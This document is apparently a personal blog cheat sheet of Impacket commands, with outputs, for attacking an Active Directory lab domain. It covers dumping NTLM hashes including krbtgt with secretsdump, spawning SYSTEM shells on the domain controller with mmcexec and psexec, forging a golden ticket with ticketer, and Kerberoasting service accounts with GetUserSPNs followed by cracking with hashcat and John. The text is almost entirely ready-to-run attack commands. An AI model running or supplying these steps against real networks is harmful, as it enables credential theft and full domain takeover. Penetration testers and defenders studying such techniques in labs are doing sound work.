5 minutes
Impacket
Just some Impacket commands reminder (secretsdump, generate a golden ticket, kerberoast, …).
DC : hashs NTLM dump, history
$ python secretsdump.py -history -user-status -just-dc-user Administrateur -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:6ced6cb821b81327d4b8b096947e0615::: (status=Enabled)
Administrateur_history0:500:aad3b435b51404eeaad3b435b51404ee:6ced6cb821b81327d4b8b096947e0615:::
Administrateur_history1:500:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
[*] Cleaning up... DC : hashs NTLM dump, user only
$ python secretsdump.py -history -user-status -just-dc-user krbtgt -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c40b7d2951af2ec4fbb356e3e99cf7a3::: (status=Disabled)
[*] Cleaning up... DC : GetADUser (name, email, passwordlast, lastlogon, description)
# Caution, description is add by me and this script also get accounts without email
$ python GetADUsers.py FOO.LOCAL/hacker:Password123
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] Querying FOO.LOCAL for information about domain. Be patient...
Name Email PasswordLastSet LastLogon Description
-------------- ----- ------------------- ------------------- ----------------------------------------------------
Administrateur 2017-07-12 16:03:33 2015-05-18 11:31:43 Compte d’utilisateur d’administration
Invité <never> <never> Compte d’utilisateur invité
2017-07-12 16:03:12 2017-07-12 16:03:15
krbtgt 2014-12-11 13:35:44 <never> Compte de service du centre de distribution de clés
test 2014-12-11 13:47:27 2014-12-15 14:21:34 pwd : powa1234!
2015-05-13 09:14:39 2015-05-18 11:45:32
2014-12-15 11:20:17 2014-12-15 13:54:21
fdupont <never> <never> pwd : P4ssw0rd!!
tlastname <never> <never> pwd : P4ssw0rd!
bwayne <never> <never> pwd : P4ssw0rd!
cklent <never> <never> pwd : P4ssw0rd!
tjoker 2015-05-13 09:40:34 2015-05-13 09:42:26 pwd : P4ssw0rd!
tbatman <never> <never> pwd : P4ssw0rd!
test0000 <never> <never>
hacker 2017-07-12 16:04:57 <never> Shell spawn (to exec command, add the command at the end)
$ python mmcexec.py FOO.LOCAL/Administrateur:P4ssw0rd\!@DC1.FOO.LOCAL
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
foo\administrateurShell spawn with kerberos
$ export KRB5CCNAME=administrateur.ccache
$ python psexec.py -k -no-pass FOO.LOCAL/administrateur@DC1.foo.local
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] Requesting shares on DC1.foo.local.....
[*] Found writable share ADMIN$
[*] Uploading file ypDKgeHL.exe
[*] Opening SVCManager on DC1.foo.local.....
[*] Creating service iqzz on DC1.foo.local.....
[*] Starting service iqzz.....
[!] Press help for extra shell commands
Microsoft Windows [version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Tous droits réservés.
C:\Windows\system32>whoami
autorite nt\systèmeGOLDEN TICKET !
- -nthash > nthash from krbtgt
- -domain-sid > echo lsaquery | rpcclient 192.168.56.151 -U “FOO\limited_user%Password123”
- -domain > domain FQDN
- “Administrateur” > User for which the ticket is generated
$ python ticketer.py -nthash c40b7d2951af2ec4fbb356e3e99cf7a3 -domain-sid S-1-5-21-4043646307-996402590-333264239 -domain FOO.LOCAL Administrateur
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for foo.local/Administrateur
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrateur.ccacheImport Administrateur.ccache on Linux :
# Clear tickets
$ kdestroy
kdestroy: No credentials cache found while destroying cache# List tickets
$ klist
klist: No credentials cache found (filename: /tmp/krb5cc_1000)$ smbclient \\\\DC1.foo.local\\c$ -k
WARNING: The "syslog" option is deprecated
SPNEGO: Could not find a suitable mechtype in NEG_TOKEN_INIT
session setup failed: NT_STATUS_INTERNAL_ERROR$ cp Administrateur.ccache /tmp/krb5cc_1000; klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: Administrateur@FOO.LOCAL
Valid starting Expires Service principal
12/07/2017 16:49:34 10/07/2027 16:49:34 krbtgt/FOO.LOCAL@FOO.LOCAL
renew until 10/07/2027 16:49:34smbclient with kerberos
$ smbclient \\\\DC1.foo.local\\c$ -k
WARNING: The "syslog" option is deprecated
smb: \> dir
$Recycle.Bin DHS 0 Tue Jul 14 04:34:39 2009
Documents and Settings DHS 0 Tue Jul 14 07:06:44 2009
inetpub D 0 Fri Apr 17 09:50:04 2015
pagefile.sys AHS 1073741824 Mon May 18 11:28:29 2015
PerfLogs D 0 Tue Jul 14 05:20:08 2009
Program Files DR 0 Thu Dec 11 13:32:02 2014
Program Files (x86) DR 0 Thu Dec 11 13:32:04 2014
ProgramData DH 0 Thu Dec 11 13:38:09 2014
Recovery DHS 0 Thu Dec 11 11:59:44 2014
System Volume Information DHS 0 Thu Dec 11 13:32:16 2014
Users DR 0 Thu Dec 11 12:00:27 2014
Windows D 0 Wed Jul 12 16:28:03 2017
WSUS D 0 Fri Jan 9 11:27:01 2015
6527487 blocks of size 4096. 4199729 blocks available
smb: \> Get UserSPN
$ python GetUserSPNs.py FOO.LOCAL/Administrateur:P4ssw0rd\!
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
No entries found!WITH RPC CLIENT
Get Domain SID
# Anonymous
$ rpcclient 192.168.56.151 -U "" -N
# With creds
$ rpcclient 192.168.56.151 -U "FOO\Hacker%Password123"
rpcclient $> lsaquery
Domain Name: FOO
Domain Sid: S-1-5-21-4043646307-996402590-333264239Get User SID
$ rpcclient 192.168.56.151 -U "FOO\Hacker%Password123"
rpcclient $> lookupnames krbtgt
krbtgt S-1-5-21-4043646307-996402590-333264239-502 (User: 1)
rpcclient $> lookupnames administrateur
administrateur S-1-5-21-4043646307-996402590-333264239-500 (User: 1)
rpcclient $> Navigate with SMB
$ smbclient \\\\DC1.foo.local\\c$ -U "FOO\administrateur"
WARNING: The "syslog" option is deprecated
Enter FOO\administrateur's password:
smb: \> dir
$Recycle.Bin DHS 0 Tue Jul 14 04:34:39 2009
Documents and Settings DHS 0 Tue Jul 14 07:06:44 2009
inetpub D 0 Fri Apr 17 09:50:04 2015
pagefile.sys AHS 1073741824 Mon May 18 11:28:29 2015
PerfLogs D 0 Tue Jul 14 05:20:08 2009
Program Files DR 0 Thu Dec 11 13:32:02 2014
Program Files (x86) DR 0 Thu Dec 11 13:32:04 2014
ProgramData DH 0 Thu Dec 11 13:38:09 2014
Recovery DHS 0 Thu Dec 11 11:59:44 2014
System Volume Information DHS 0 Thu Dec 11 13:32:16 2014
Users DR 0 Thu Dec 11 12:00:27 2014
Windows D 0 Wed Jul 12 16:28:03 2017
WSUS D 0 Fri Jan 9 11:27:01 2015
6527487 blocks of size 4096. 4199745 blocks available
smb: \> Kerberoast - SPN
$ python GetUserSPNs.py -request FOO.LOCAL/hacker:Password123
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------- -------- --------------- ---------
http/PC1 userspn <never> <never>
$krb5tgs$23$*userspn$FOO.LOCAL$http/PC1*$f33c6a7ab50147a947f4137c026094bc$4898eb160d446d18a6babc80d884358f5c2bfafe2441acfcce20392e90a8169d82810f6529f025d2e85211c9b3a8e1b4000974216065485fccff22ebf025ec16a90e67ede74736788c22790bfc6299e94fe8611a6bc4a8e69ff1dc8f98c3561cc5247b5ccdeb6052e685a80c26b15e30e711399483a4822840ae0d83793c0c4bedda63d3e1c6defff307d1ccc998cb577f73377d56e833b3133ab70d2587a7a7d404278904016bf226bfe8b304b05258c38cd9387f42bfde883354c24159e183e4d4deabf0f6af1fe0bd2aa7b5d532cbdc412542a97c7c7b962d4ad0956f8d2f11040b1c28662f97c2ba130122458fb31b570e11325b87be9cebd2dfa6b281dc79721986a07ea296d147af420083c92d644f5e79d91d0c1cd059619dec3883489128dc921930cccaeb17f4dce924ce2353d72af8f0fb86fedb9d473481ffe219603144494e3351c9a83a814b57a4bd5a51646d37a349ff0936bf9197c9682e61ebc2557c1ffbdb27ab4edb9691a1319e7d29a79c8741eef41009ce224860ea08d03510fb3046382913a3053729cd73bc0d58d3040e6e8512acfdcf4cd0383b926cddea132ebf7e398873996bf723b5ac2196e274c6a2ae8b6300ae03ec4214584515c7b8400c7791d28a54c9ca477d78c76b192f142961093a32fe569212b5ce7bddc951caed56f5ffbffc4e729a1f789af7f1709b7c7c91549baf05dc827f9ecfbf383b661694d2057fedbb0c920b90b303a9bf0cbd429a37f40799081f23effffedba6c186a3f82732583550e39efe117d446657c38192b1c4cd1192cc322eee745d4c8463547fe42ca1e08537bb2241382aa0123463f0e272b03d1420e28510d5b102939e9bb173674d3b7c8e41fbd978d9f7d9697a3c691a6d33aba4fca7a99331d72c18e0ac56bd9540b56aca8771d95651ef92780a7e679e00b38f795d462f71acb6fbb5e4128fb6dae76eb60ee93019092a8dd9f8ac5e8eedbf924b9f91072075c5c99a278b4483815e3441824d86f48e43af731a9ec2ad50d5792e00c4e31c5f8d793fde944d476a83f9c4dfa7a41cc57bf8d5fbb8f44f873842bfc0a3784298accf348b8b048d6eee84a79f802fb3a00d2b4d324dc6255a5bf7a5d304030d1225d90b83d807e055fb6c75c85f46e0409aea9d638c7dc7976fb37404e7fffe5b244ac031eeccf45e1bd6729f15dcc2004bfbe156Cracking SPN Tickets
$ python GetUserSPNs.py -request -o /tmp/hash FOO.LOCAL/hacker:Password123
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------- -------- --------------- ---------
http/PC1 userspn <never> <never> # Hashcat
$ hashcat -m 13100 /tmp/hash /tmp/wordlist
# John
~/Programs/JohnTheRipper/run/john --wordlist=/tmp/wordlist /tmp/hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Http1234 (?)
1g 0:00:00:00 DONE (2017-07-13 14:24) 50.00g/s 50.00p/s 50.00c/s 50.00C/s Http1234
Use the "--show" option to display all of the cracked passwords reliably
Session completedMountings CIFS with KERBEROS TICKET
$ sudo mount -t cifs -o "sec=krb5,cruid=$UID,user=Administrateur,domain=FOO.BAR" //AD1.FOO.BAR/C$ /mnt/test -vvv